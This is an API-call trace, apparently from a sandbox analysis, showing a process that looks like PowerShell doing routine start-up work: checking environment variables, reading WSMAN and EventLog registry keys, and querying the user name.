	[0340.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0340.674] CoTaskMemFree (pv=0x1f7c30) 
	[0340.685] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0340.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0340.685] CoTaskMemFree (pv=0x1f7c30) 
	[0340.687] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0340.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0340.687] CoTaskMemFree (pv=0x1f7c30) 
	[0340.687] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0340.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0340.687] CoTaskMemFree (pv=0x1f7c30) 
	[0341.258] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d398 | out: phkResult=0x14d398*=0x2e4) returned 0x0
	[0341.261] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d29c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d298, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d29c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d298*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.261] CoTaskMemFree (pv=0x0) 
	[0341.262] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.262] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x0, lpValueName=0x245a70, lpcchValueName=0x14d348, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d348, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0341.262] CoTaskMemFree (pv=0x245a70) 
	[0341.262] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.262] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x1, lpValueName=0x245a70, lpcchValueName=0x14d348, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d348, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0341.263] CoTaskMemFree (pv=0x245a70) 
	[0341.263] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.263] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x2, lpValueName=0x245a70, lpcchValueName=0x14d348, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d348, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0341.263] CoTaskMemFree (pv=0x245a70) 
	[0341.263] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d32c, lpData=0x0, lpcbData=0x14d328*=0x0 | out: lpType=0x14d32c*=0x1, lpData=0x0, lpcbData=0x14d328*=0x8) returned 0x0
	[0341.263] CoTaskMemAlloc (cb=0xc) returned 0x2ab450
	[0341.263] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d2fc, lpData=0x2ab450, lpcbData=0x14d2f8*=0x8 | out: lpType=0x14d2fc*=0x1, lpData="2.0", lpcbData=0x14d2f8*=0x8) returned 0x0
	[0341.263] CoTaskMemFree (pv=0x2ab450) 
	[0341.630] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2e8 | out: phkResult=0x14d2e8*=0x32c) returned 0x0
	[0341.630] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d1ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d1e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d1ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d1e8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.630] CoTaskMemFree (pv=0x0) 
	[0341.630] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.630] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x245a70, lpcchValueName=0x14d298, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d298, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0341.631] CoTaskMemFree (pv=0x245a70) 
	[0341.631] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.631] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x245a70, lpcchValueName=0x14d298, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d298, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0341.631] CoTaskMemFree (pv=0x245a70) 
	[0341.631] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.631] RegEnumValueW (in: hKey=0x32c, dwIndex=0x2, lpValueName=0x245a70, lpcchValueName=0x14d298, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d298, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0341.631] CoTaskMemFree (pv=0x245a70) 
	[0341.631] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d27c, lpData=0x0, lpcbData=0x14d278*=0x0 | out: lpType=0x14d27c*=0x1, lpData=0x0, lpcbData=0x14d278*=0x8) returned 0x0
	[0341.631] CoTaskMemAlloc (cb=0xc) returned 0x2ab4f0
	[0341.631] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d24c, lpData=0x2ab4f0, lpcbData=0x14d248*=0x8 | out: lpType=0x14d24c*=0x1, lpData="2.0", lpcbData=0x14d248*=0x8) returned 0x0
	[0341.631] CoTaskMemFree (pv=0x2ab4f0) 
	[0341.632] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0341.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0341.632] CoTaskMemFree (pv=0x1f7c30) 
	[0341.636] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0341.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0341.637] CoTaskMemFree (pv=0x1f7c30) 
	[0341.642] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d318 | out: phkResult=0x14d318*=0x1c8) returned 0x0
	[0341.643] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d28c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d288, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d28c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d288*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.643] CoTaskMemFree (pv=0x0) 
	[0341.644] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.644] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x0, lpName=0x245a70, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.644] CoTaskMemFree (pv=0x245a70) 
	[0341.644] CoTaskMemFree (pv=0x0) 
	[0341.644] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.644] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x1, lpName=0x245a70, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.644] CoTaskMemFree (pv=0x245a70) 
	[0341.644] CoTaskMemFree (pv=0x0) 
	[0341.644] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.644] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x2, lpName=0x245a70, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.644] CoTaskMemFree (pv=0x245a70) 
	[0341.644] CoTaskMemFree (pv=0x0) 
	[0341.644] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.644] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x3, lpName=0x245a70, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.644] CoTaskMemFree (pv=0x245a70) 
	[0341.645] CoTaskMemFree (pv=0x0) 
	[0341.645] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.645] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x4, lpName=0x245a70, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.645] CoTaskMemFree (pv=0x245a70) 
	[0341.645] CoTaskMemFree (pv=0x0) 
	[0341.645] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.645] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x5, lpName=0x245a70, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.645] CoTaskMemFree (pv=0x245a70) 
	[0341.645] CoTaskMemFree (pv=0x0) 
	[0341.645] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.645] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x6, lpName=0x245a70, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.645] CoTaskMemFree (pv=0x245a70) 
	[0341.645] CoTaskMemFree (pv=0x0) 
	[0341.645] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.645] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x7, lpName=0x245a70, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.645] CoTaskMemFree (pv=0x245a70) 
	[0341.645] CoTaskMemFree (pv=0x0) 
	[0341.645] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.645] RegEnumKeyExW (in: hKey=0x1c8, dwIndex=0x8, lpName=0x245a70, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0341.645] CoTaskMemFree (pv=0x245a70) 
	[0341.645] CoTaskMemFree (pv=0x0) 
	[0341.645] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x1d0) returned 0x0
	[0341.645] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0341.645] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x1cc) returned 0x0
	[0341.645] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0341.646] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x31c) returned 0x0
	[0341.646] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0341.646] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x330) returned 0x0
	[0341.646] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0341.646] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x334) returned 0x0
	[0341.646] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0341.646] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x338) returned 0x0
	[0341.646] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0341.646] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x33c) returned 0x0
	[0341.646] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0341.646] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x340) returned 0x0
	[0341.646] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0341.647] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x344) returned 0x0
	[0341.647] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x348) returned 0x0
	[0341.647] RegCloseKey (hKey=0x348) returned 0x0
	[0341.647] RegCloseKey (hKey=0x1c8) returned 0x0
	[0341.648] RegCloseKey (hKey=0x344) returned 0x0
	[0341.973] CoTaskMemAlloc (cb=0x804) returned 0x1b755000
	[0341.974] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b755000, nSize=0x14d588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d588) returned 0x1
	[0341.975] CoTaskMemFree (pv=0x1b755000) 
	[0341.976] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0341.976] GetUserNameW (in: lpBuffer=0x245a70, pcbBuffer=0x14d5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d5c8) returned 1
	[0341.976] CoTaskMemFree (pv=0x245a70) 
	[0342.002] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2c8 | out: phkResult=0x14d2c8*=0x34c) returned 0x0
	[0342.002] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d23c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d238, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d23c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d238*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.003] CoTaskMemFree (pv=0x0) 
	[0342.003] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.003] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.003] CoTaskMemFree (pv=0x245a70) 
	[0342.003] CoTaskMemFree (pv=0x0) 
	[0342.003] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.003] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.003] CoTaskMemFree (pv=0x245a70) 
	[0342.003] CoTaskMemFree (pv=0x0) 
	[0342.003] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.003] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.003] CoTaskMemFree (pv=0x245a70) 
	[0342.003] CoTaskMemFree (pv=0x0) 
	[0342.003] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.003] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.003] CoTaskMemFree (pv=0x245a70) 
	[0342.003] CoTaskMemFree (pv=0x0) 
	[0342.003] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.004] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.004] CoTaskMemFree (pv=0x245a70) 
	[0342.004] CoTaskMemFree (pv=0x0) 
	[0342.004] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.004] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.004] CoTaskMemFree (pv=0x245a70) 
	[0342.004] CoTaskMemFree (pv=0x0) 
	[0342.004] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.004] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.004] CoTaskMemFree (pv=0x245a70) 
	[0342.004] CoTaskMemFree (pv=0x0) 
	[0342.004] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.004] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.004] CoTaskMemFree (pv=0x245a70) 
	[0342.004] CoTaskMemFree (pv=0x0) 
	[0342.004] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.004] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.004] CoTaskMemFree (pv=0x245a70) 
	[0342.005] CoTaskMemFree (pv=0x0) 
	[0342.005] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x350) returned 0x0
	[0342.005] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.005] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x354) returned 0x0
	[0342.005] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.005] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x358) returned 0x0
	[0342.005] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.005] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x35c) returned 0x0
	[0342.005] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.006] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x360) returned 0x0
	[0342.006] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.006] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x364) returned 0x0
	[0342.006] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.006] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x368) returned 0x0
	[0342.461] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.461] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x350) returned 0x0
	[0342.461] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.461] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x354) returned 0x0
	[0342.462] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x358) returned 0x0
	[0342.462] RegCloseKey (hKey=0x358) returned 0x0
	[0342.462] RegCloseKey (hKey=0x34c) returned 0x0
	[0342.462] RegCloseKey (hKey=0x354) returned 0x0
	[0342.463] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2c8 | out: phkResult=0x14d2c8*=0x354) returned 0x0
	[0342.463] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d23c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d238, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d23c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d238*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.463] CoTaskMemFree (pv=0x0) 
	[0342.463] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.463] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.463] CoTaskMemFree (pv=0x245a70) 
	[0342.463] CoTaskMemFree (pv=0x0) 
	[0342.463] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.463] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.463] CoTaskMemFree (pv=0x245a70) 
	[0342.464] CoTaskMemFree (pv=0x0) 
	[0342.464] CoTaskMemAlloc (cb=0x204) returned 0x245a70
